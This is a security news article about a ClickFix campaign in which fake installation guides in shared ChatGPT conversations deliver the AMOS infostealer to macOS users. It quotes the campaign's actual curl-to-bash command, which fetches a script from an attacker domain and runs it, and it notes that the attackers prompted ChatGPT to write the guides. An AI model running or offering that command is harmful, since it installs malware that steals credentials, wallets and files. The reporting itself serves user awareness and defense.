A new macOS malware campaign is exploiting the official ChatGPT website to distribute an infostealer known as AMOS. Attackers are leveraging a technique dubbed “ClickFix” to spread the malicious software by posting fake installation guides on the legitimate chatgpt.com domain. This sophisticated attack highlights how threat actors can manipulate popular platforms to reach unsuspecting users.
The campaign hinges on ChatGPT’s chat-sharing feature, which allows users to create and share public conversations as links that appear to originate from OpenAI. This illusion of legitimacy allows attackers to trick macOS users, who are searching for ways to enhance their ChatGPT experience or find related tools, into downloading malware.
New ClickFix Attacks Target macOS Users via Official ChatGPT Website
The attack commences with strategically placed paid advertisements on Google, targeting searches related to “chatgpt atlas.” These sponsored links are designed to mimic legitimate searches, leading users to what appears to be the official ChatGPT domain. The ad itself displays a compelling title, “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac,” further bolstering its trustworthiness.
Upon clicking these deceptive ads, users are directed to a shared ChatGPT conversation hosted on the chatgpt.com/share/ subdomain. This shared chat allegedly contains installation instructions for a non-existent browser named Atlas. Kaspersky security researchers have identified that the malicious actors employed prompt engineering to guide ChatGPT in generating these convincing, yet fabricated, installation guides. The attackers then meticulously cleaned the chat history to remove any potentially suspicious content before making the conversation public.
The use of the chatgpt.com/share/ subdomain is a critical element of the social engineering aspect of this campaign. Many users may not recognize that this is simply a shared conversation and could mistakenly believe it to be official content or a legitimate tool provided by OpenAI. This perceived authority makes them more likely to follow the embedded instructions.
The Infection Mechanism for the AMOS Infostealer
The fake installation guide provided within the shared ChatGPT conversation instructs macOS users to open their Terminal application and execute a specific command. This command, which reportedly reads `/bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)”`, instructs the system to download a malicious script from an attacker-controlled server hosted at atlas-extension.com and execute it immediately. This process bypasses standard security checks by directly fetching and running code.
Once executed, the downloaded script prompts the user for their system password. It will repeatedly request the password until the correct credentials are provided. Upon successfully obtaining the system password, the script proceeds to download and install the AMOS infostealer. The stolen credentials are then used to facilitate the malware’s installation and operation.
Capabilities of the AMOS Infostealer
The AMOS infostealer is designed to exfiltrate sensitive information from infected macOS systems. According to security analyses, it is capable of stealing passwords, cookies, and other browser data from popular web browsers such as Chrome and Firefox. Furthermore, AMOS specifically targets cryptocurrency wallet information from wallets like Electrum, Coinomi, and Exodus, posing a significant financial threat to users.
Beyond browser and cryptocurrency data, the malware has the ability to collect files with common extensions such as TXT, PDF, and DOCX from frequently accessed user folders, including Desktop, Documents, and Downloads. To ensure persistent access, it also installs a backdoor that automatically starts with the system. This backdoor grants attackers continuous remote access to the compromised system, allowing them to operate undetected and potentially deploy further malicious payloads.
The ongoing development of such sophisticated attack vectors, which exploit the trust users place in popular AI platforms and their associated domains, necessitates heightened vigilance from cybersecurity professionals and end-users alike. As threat actors continue to innovate, the focus on robust endpoint security and user education remains paramount in mitigating the risks posed by emerging malware campaigns like this one targeting macOS users.